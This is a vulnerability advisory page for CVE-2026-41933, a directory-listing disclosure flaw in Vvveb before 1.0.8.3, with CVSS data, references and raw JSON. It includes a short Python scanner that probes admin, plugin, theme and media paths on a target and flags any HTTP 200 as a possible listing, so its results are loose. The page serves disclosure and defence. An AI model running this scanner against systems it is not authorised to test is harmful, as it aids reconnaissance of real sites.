CVE-2026-41933

Description

Vvveb before 1.0.8.3 contains a directory listing information disclosure vulnerability that allows unauthenticated attackers to enumerate files and directories by accessing multiple paths lacking proper index directives in .htaccess files. Attackers can access directories such as admin asset paths, plugins, themes, and media folders to view filenames, file sizes, modification timestamps, and unrendered admin templates containing sensitive route maps.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Vvveb < 1.0.8.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# PoC code to check for directory listing vulnerability
import requests

def check_directory_listing(base_url):
    # Paths identified in the vulnerability description
    vulnerable_paths = [
        "/admin/assets/",
        "/plugins/",
        "/themes/",
        "/media/"
    ]
    
    print(f"[*] Scanning {base_url} for CVE-2026-41933...")
    
    for path in vulnerable_paths:
        target_url = f"{base_url}{path}"
        try:
            response = requests.get(target_url, timeout=5)
            # Check for common indicators of directory listing
            if "Index of /" in response.text or "Parent Directory" in response.text or response.status_code == 200:
                print(f"[+] Potential directory listing found at: {target_url}")
                print(f"    Response snippet: {response.text[:100]}...")
            else:
                print(f"[-] No listing detected at: {target_url}")
        except requests.RequestException as e:
            print(f"[!] Error connecting to {target_url}: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with the target host
    check_directory_listing(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-41933
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-41933
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-41933/
[4] VulDB https://vuldb.com/cve/CVE-2026-41933
[5] https://github.com/givanz/Vvveb/commit/96ae04c5e4a295e281adc1d02d77444173653deb
[6] https://github.com/givanz/Vvveb/releases/tag/1.0.8.3
[7] https://www.vulncheck.com/advisories/vvveb-directory-listing-information-disclosure

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-41933", "sourceIdentifier": "[email protected]", "published": "2026-05-14T15:16:45.873", "lastModified": "2026-05-14T16:24:56.240", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vvveb before 1.0.8.3 contains a directory listing information disclosure vulnerability that allows unauthenticated attackers to enumerate files and directories by accessing multiple paths lacking proper index directives in .htaccess files. Attackers can access directories such as admin asset paths, plugins, themes, and media folders to view filenames, file sizes, modification timestamps, and unrendered admin templates containing sensitive route maps."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-548"}]}], "references": [{"url": "https://github.com/givanz/Vvveb/commit/96ae04c5e4a295e281adc1d02d77444173653deb", "source": "[email protected]"}, {"url": "https://github.com/givanz/Vvveb/releases/tag/1.0.8.3", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/vvveb-directory-listing-information-disclosure", "source": "[email protected]"}]}}